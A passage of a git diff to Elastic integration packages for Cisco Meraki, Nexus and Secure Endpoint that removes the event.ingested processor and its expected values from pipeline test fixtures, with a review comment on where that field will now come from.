@@ -868,9 +652,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402890747Z" - }, "message": "ttenb olor.quiav gna security_event Nem signature=tdolorem priority=eacomm timestamp=1542964506.upidata dhost=01:00:5e:6a:c8:f8 direction=unknown protocol=ipv6 src=10.246.152.72:4293 dst=10.34.62.190:1641 message:eve", "tags": [ "preserve_original_event" @@ -880,9 +661,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402891635Z" - }, "message": "quisn 1544199460.rem ulamcola events dhcp no offers for mac 01:00:5e:67:fc:cb", "tags": [ "preserve_original_event" @@ -892,9 +670,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402892676Z" - }, "message": "eruntmo 1545434414.nimve usanti_ events dhcp release for mac 01:00:5e:7d:de:f7", "tags": [ "preserve_original_event" @@ -904,9 +679,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402897820Z" - }, "message": "uatu 1546669369.olupta consequu_ events dhcp release for mac 01:00:5e:6b:96:f2", "tags": [ "preserve_original_event" @@ -916,9 +688,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402900543Z" - }, "message": "sitam inibusBo.illoin emUtenim ids-alerts signature=ende priority=dexea timestamp=1547904323.acoprotocol=ipv6 src=10.244.32.189 dst=10.121.9.5message: uptas", "tags": [ "preserve_original_event" @@ -928,9 +697,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402902009Z" - }, "message": "edol 1549139277.sequuntu quameius_ events content_filtering_block url='https://www.example.com/totamrem/aliqu.htm?sBonorum=moenimi#lor' category0='auto' server='10.41.124.15:333'", "tags": [ "preserve_original_event" 
@@ -940,9 +706,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402903304Z" - }, "message": "antium 1550374232.remaper eseosq events dhcp no offers for mac 01:00:5e:c3:77:27", "tags": [ "preserve_original_event" @@ -952,9 +715,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402904182Z" - }, "message": "oditau 1551609186.onsec dit events MAC 01:00:5e:19:86:21 and MAC 01:00:5e:ed:ed:79 both claim IP: 10.43.235.230", "tags": [ "preserve_original_event" @@ -964,9 +724,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402905133Z" - }, "message": "asper dictasun.psa lorese_ ids-alerts ctobeat ids-alerts signature=onsec priority=idestl timestamp=1552844140.litani shost=01:00:5e:a0:b2:c9 direction=unknown protocol=icmp src=10.199.19.205:5823 dst=10.103.91.159:7116 message: ntut", "tags": [ "preserve_original_event" @@ -976,9 +733,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402906346Z" - }, "message": "estiaec 1554079094.pitlabo tas_appliance flows src=10.17.111.91 dst=10.65.0.157 mac=01:00:5e:49:c4:17 protocol=udp pattern: 1 nostrum", "tags": [ "preserve_original_event" @@ -988,9 +742,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402907198Z" - }, "message": "ercitati 1555314049.atem serro flows cancel", "tags": [ "preserve_original_event" @@ -1000,9 +751,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402908149Z" - }, "message": "amquaera 1556549003.rsitamet leumiur events MAC 01:00:5e:fd:79:9e and MAC 01:00:5e:4d:c0:dd both claim IP: 10.20.130.88", "tags": [ "preserve_original_event" 
@@ -1012,9 +760,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402909011Z" - }, "message": "abill ametcon.ofdeFini tasnu_ ids-alerts tionev ids-alerts signature=uasiarch priority=velites timestamp=1557783957.uredolorprotocol=ipv6 src=10.177.64.152 dst=10.140.242.86message: temporin", "tags": [ "preserve_original_event" @@ -1024,9 +769,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402909867Z" - }, "message": "lor nvolupt.dquia ora_ security_event dipi security_event ecatc signature=quovolu priority=ite timestamp=1559018911.itse shost=01:00:5e:b8:73:c8 direction=external protocol=icmp src=10.199.103.185:2449 dst=10.51.121.223:24 message:stenat", "tags": [ "preserve_original_event" @@ -1036,9 +778,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402910758Z" - }, "message": "saq 1560253866.asiarch ssuscipi events MAC 01:00:5e:93:48:61 and MAC 01:00:5e:21:c2:55 both claim IP: 10.126.242.58", "tags": [ "preserve_original_event" @@ -1048,9 +787,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402911649Z" - }, "message": "tlab 1561488820.vel ionevo events dhcp release for mac 01:00:5e:8a:1a:f9", "tags": [ "preserve_original_event" @@ -1060,9 +796,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402912501Z" - }, "message": "aeab 1562723774.uradipis aerat_ flows uira flows deny src=10.121.37.244 dst=10.113.152.241 mac=01:00:5e:9c:86:62 protocol=udp type=utaliqui ", "tags": [ "preserve_original_event" 
@@ -1072,9 +805,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402913354Z" - }, "message": "nesciu 1563958728.mali roinBCSe_appliance events aid=eetdolor arp_resp=tpersp arp_src=assi auth_neg_dur=rch auth_neg_failed=psa channel=nreprehe dns_req_rtt=pidatatn dns_resp=isno dns_server=luptatev duration=39.622000 full_conn=lla identity=urau ip_resp=aeca ip_src=10.247.118.132 is_8021x=atcupi is_wpa=enima last_auth_ago=uptateve radio=fugitsed reason=lumqui rssi=ectet type=ionu vap=eratv client_mac=01:00:5e:10:8b:c3 client_ip=10.153.33.99 instigator=liq http_resp=xerc dhcp_lease_completed=atisetqu dhcp_ip=squir dhcp_server=gnaaliq dhcp_server_mac=quam dhcp_resp=deriti url=https://www5.example.org/eturadi/umS.txt?mSecti=henderi#taevitae category0=tevel server=10.254.96.130 vpn_type=ita connectivity=iquipexe", "tags": [ "preserve_original_event" @@ -1084,9 +814,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402914214Z" - }, "message": "tot 1565193683.reme emeumfu events aid=inBCSedu arp_resp=ita arp_src=ade auth_neg_dur=nihilmol auth_neg_failed=nder channel=ano dns_req_rtt=rumexer dns_resp=eab dns_server=iaconseq duration=18.963000 full_conn=eli identity=rissusci ip_resp=ectetur ip_src=10.101.13.122 is_8021x=oconsequ is_wpa=roqui last_auth_ago=oluptate radio=ntut reason=mremaper rssi=uteirur type=ntium vap=ide client_mac=01:00:5e:95:ae:d0 client_ip=10.78.143.52 instigator=ntiumdol http_resp=conse dhcp_lease_completed=aturve dhcp_ip=edqui dhcp_server=tvolu dhcp_server_mac=psu dhcp_resp=strud url=https://internal.example.org/fdeFi/ratv.htm?sequatu=tiumtot#tate category0=udanti server=10.200.98.243 vpn_type=cteturad connectivity=umq", "tags": [ "preserve_original_event" 
@@ -1096,9 +823,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402915077Z" - }, "message": "oinvento 1566428637.mporin orissusc_appliance events content_filtering_block url='https://www5.example.net/uov/pariat.htm?litsed=lumd#tiaec' category0='lorem' server='10.247.205.185:7676' client_mac='01:00:5e:6f:21:c8'", "tags": [ "preserve_original_event" @@ -1108,9 +832,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402915952Z" - }, "message": "metMa emoen.ptate mipsumqu_ ids-alerts ccusa ids-alerts signature=billo priority=doloremi timestamp=1567663591.ectetura dhost=01:00:5e:0a:88:bb direction=inbound protocol=ipv6 src=10.195.90.73:3914 dst=10.147.165.30:7662 message: idents", "tags": [ "preserve_original_event" @@ -1120,9 +841,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402916820Z" - }, "message": "veniamqu 1568898545.iconsequ ueporr_appliance events IDS: empor", "tags": [ "preserve_original_event" @@ -1132,9 +850,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402917680Z" - }, "message": "atDuisa mipsa.uas iat ids-alerts signature=hite priority=adipis timestamp=1570133500.abo dhost=01:00:5e:dd:cb:5b direction=inbound protocol=udp src=10.137.166.97 dst=10.162.202.14 message: ipsaqua", "tags": [ "preserve_original_event" @@ -1144,9 +859,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402918551Z" - }, "message": "deom 1571368454.tiumdo rautod_appliance events content_filtering_block url='https://www5.example.com/illoinve/etcon.htm?nevolup=erspici#itinvolu' category0='adeserun' server='10.227.135.142:6598'", "tags": [ "preserve_original_event" 
@@ -1156,9 +868,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402919417Z" - }, "message": "orese 1572603408.umdolore umqui_appliance events MAC 01:00:5e:f1:b8:3a and MAC 01:00:5e:37:9c:af both claim IP: 10.199.29.19", "tags": [ "preserve_original_event" @@ -1168,9 +877,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402920282Z" - }, "message": "explicab 1573838362.samvolu teiru_appliance events dhcp no offers for mac 01:00:5e:b8:06:92", "tags": [ "preserve_original_event" @@ -1180,9 +886,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402921147Z" - }, "message": "rissusci 1575073317.uaturQ iusmod_ events aid=mips arp_resp=iduntutl arp_src=mipsumd auth_neg_dur=eiusmo auth_neg_failed=quelauda channel=rcit dns_req_rtt=dolo dns_resp=ulamc dns_server=doe duration=10.574000 full_conn=remquela identity=toreve ip_resp=squirat ip_src=10.85.59.172 is_8021x=mto is_wpa=iae last_auth_ago=dent radio=Uten reason=tatiset rssi=sequat type=modoco vap=beataevi client_mac=01:00:5e:92:d8:95 client_ip=10.158.215.216 instigator=deritin http_resp=ptate dhcp_lease_completed=lloi dhcp_ip=nseq dhcp_server=equunt dhcp_server_mac=tutla dhcp_resp=usmod url=https://example.com/qui/itse.gif?orsitame=tasn#exeaco category0=upta server=10.75.122.111 vpn_type=reprehe connectivity=deFinib", "tags": [ "preserve_original_event" @@ -1192,9 +895,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:05:18.402922010Z" - }, "message": "orr 1576308271.pre aute events IDS: rchite", "tags": [ "preserve_original_event" diff --git a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 546c92efd60..b18eacfd43b 100644 --- a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml 
+++ b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Cisco Meraki processors: - # ECS event.ingested - - set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json index 5342e9a5e2b..0385cd6b714 100644 --- a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json +++ b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json @@ -4,9 +4,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:08:51.152643821Z" - }, "message": "2012 Dec 18 14:51:08 Nexus5010-B %AUTHPRIV-3-SYSTEM_MSG: pam_aaa:Authentication failed for user en from 2.2.2.1 - login", "tags": [ "preserve_original_event" diff --git a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml index d916e519ac8..3cb188fd946 100644 --- a/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_nexus/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Cisco Nexus processors: - # ECS event.ingested - - set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json index 96c4828064a..c47b6a79304 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json 
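Review bot: Nothing on the new side of the Cisco Meraki `default.yml` says where `event.ingested` is supposed to come from now that its `set` processor is gone, and the Cisco Nexus `default.yml` hunk that follows has the same gap. Presumably the field is left to the Fleet-managed final pipeline, but that is not visible in this diff. If these pipelines ever run without it, detection rules and ingest-lag checks keyed on `event.ingested` would lose the field silently. I would add a comment above the first processor, `# event.ingested is intentionally not set here; it is expected from the Fleet final pipeline`, and confirm that the package's minimum stack version guarantees that pipeline. The `processors:` list continues past the end of both hunks.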
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json @@ -44,7 +44,6 @@ ], "code": "553648147", "id": "6411425813945647000", - "ingested": "2022-02-02T05:52:16.386270601Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", "severity": 3 
@@ -118,7 +117,6 @@ "action": "Policy Update", "code": "553648130", "id": "6533243623469744000", - "ingested": "2022-02-02T05:52:16.386273541Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 
@@ -188,7 +186,6 @@ ], "code": "1090519054", "id": "6533241347137077000", - "ingested": "2022-02-02T05:52:16.386274779Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "severity": 2 
@@ -285,7 +282,6 @@ ], "code": "553648143", "id": "6533241347137077000", - "ingested": "2022-02-02T05:52:16.386275859Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "severity": 2 
@@ -361,7 +357,6 @@ ], "code": "2164260880", "id": "6533241145273614000", - "ingested": "2022-02-02T05:52:16.386278374Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "severity": 2 
@@ -439,7 +434,6 @@ ], "code": "1090519054", "id": "6533241145273614000", - "ingested": "2022-02-02T05:52:16.386279522Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "severity": 2 
@@ -542,7 +536,6 @@ ], "code": "1090519054", "id": "6533241145273614000", - "ingested": "2022-02-02T05:52:16.386280522Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "severity": 2 
@@ -635,7 +628,6 @@ ], "code": "553648143", "id": "6533241145273614000", - "ingested": "2022-02-02T05:52:16.386281534Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "severity": 2 
@@ -714,7 +706,6 @@ ], "code": "1107296274", "id": "1521138739875754000", - "ingested": "2022-02-02T05:52:16.386282532Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening 